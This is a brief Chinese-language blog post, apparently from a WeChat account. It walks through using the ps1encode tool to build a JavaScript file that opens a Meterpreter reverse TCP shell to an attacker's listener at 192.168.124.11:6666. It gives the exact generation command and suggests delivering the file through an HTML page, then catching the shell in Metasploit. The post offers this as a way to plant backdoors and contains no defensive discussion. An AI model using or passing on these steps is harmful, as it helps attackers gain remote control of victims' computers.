0x00:简介 前两天在freebuf上看到一个利用Ink文件触发攻击链的文章,确实佩服作者的脑洞。https://www.freebuf.com/articles/system/207109.html 网络世界千奇百怪,多样式留后门,触发条件反弹shell.操作够骚才是王道。0x01:过程一、利用工具https://github.com/Cro
0x00:简介
前两天在freebuf上看到一个利用Ink文件触发攻击链的文章,确实佩服作者的脑洞。
https://www.freebuf.com/articles/system/207109.html
网络世界千奇百怪,多样式留后门,触发条件反弹shell.操作够骚才是王道。
0x01:过程
一、利用工具
https://Github.com/CroweCybersecurity/ps1encode
二、环境配置
它有很多种生成方式,详情请移步gayhub上查看
今天利用生成的js文件来反弹shell
命令:./ps1encode.rb--LHOST 192.168.124.11 --LPORT 6666 --Payload windows/Meterpreter/reverse_tcp --ENCODE cmd -t js
利用此命令生成js文件
emmm!代码很长,自己复制出来放到txt编辑器里。
并重命名为1.js(文件名随意)。
单单放一个js太单调了。实际环境下可以配合html进行调用js文件执行。
我简单的写了一个html来调用js文件
当然你也可以 一个js就反弹
准备好msf回弹的环境
执行Exploit 坐等监听执行
三、执行效果
效果图
0x02:后话
或许我的步骤会出现错误、或许我的想法会出现错误。但是我的思路是偏僻的。我每次写的文章想表达不是炫技,我跟各位比,我还是小学生,我是小菜鸟。我想表达的是思路。如果以后有表达不清楚的,造成您的质疑,您可以问我,或者百度。
文由微信公众号洛米唯熊